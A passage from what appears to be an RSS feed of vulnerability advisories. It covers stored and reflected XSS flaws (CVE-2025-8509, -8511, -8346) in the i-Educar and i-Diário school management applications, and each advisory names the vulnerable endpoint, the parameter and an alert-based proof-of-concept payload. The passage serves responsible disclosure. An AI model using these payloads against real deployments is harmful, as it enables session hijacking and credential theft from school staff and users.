&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8509-cross-site-scripting-xss-stored-endpoint-intraneteducar_servidor_cadphp-parameter-matricula&amp;#34;&amp;gt;CVE-2025-8509: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8509&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(12)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt; 
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8509/image.png&amp;#34;
	width=&amp;#34;854&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8509/image_hu_92b37feeb3dbded9.png 480w, /p/cve-2025-8509/image_hu_6146d3e89a533279.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;126&amp;#34;
		data-flex-basis=&amp;#34;304px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;On &amp;lt;code&amp;gt;/intranet/educar_servidor_det.php?cod_servidor=28915&amp;amp;ref_cod_instituicao=1&amp;lt;/code&amp;gt; page click on &amp;lt;code&amp;gt;&amp;#34;Editar&amp;#34;&amp;lt;/code&amp;gt; button.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8509/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;354&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8509/image-1_hu_f1e1a80ba93b939e.png 480w, /p/cve-2025-8509/image-1_hu_fe73307a5bce70dc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;573px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload was submitted through the matricula field and successfully stored. Upon accessing the affected content, the JavaScript executes immediately in the context of the victim’s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8511</title>
        <link>https://www.cvehunters.com/p/cve-2025-8511/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8511/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8511-cross-site-scripting-xss-stored-endpoint-diario-de-observacoesid-parameter-observações--descrição&amp;#34;&amp;gt;CVE-2025-8511: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Observações &amp;amp;gt; Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Observações &amp;gt; Descrição&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8511-cross-site-scripting-xss-stored-endpoint-diario-de-observacoesid-parameter-observações--descrição&amp;#34;&amp;gt;CVE-2025-8511: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Observações &amp;amp;gt; Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8511&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Observações &amp;gt; Descrição&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/diario-de-observacoes/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Observações &amp;amp;gt; Descrição&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Observações &amp;gt; Descrição&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;  &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8511/image.png&amp;#34;
	width=&amp;#34;911&amp;#34;
	height=&amp;#34;898&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8511/image_hu_f881a20290b02ea9.png 480w, /p/cve-2025-8511/image_hu_77597c0c3a04f49b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;101&amp;#34;
		data-flex-basis=&amp;#34;243px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8346</title>
        <link>https://www.cvehunters.com/p/cve-2025-8346/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8346/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8346-cross-site-scripting-xss-reflected-endpoint-educar_aluno_lstphp-via-ref_cod_matricula-parameter&amp;#34;&amp;gt;CVE-2025-8346: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; via &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt; parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVE&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Hunters&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8346/image.png&amp;#34;
	width=&amp;#34;2226&amp;#34;
	height=&amp;#34;1408&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8346/image_hu_4ad20b410643cee4.png 480w, /p/cve-2025-8346/image_hu_8466039bf764aed0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;379px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;full-payload&amp;#34;&amp;gt;Full Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
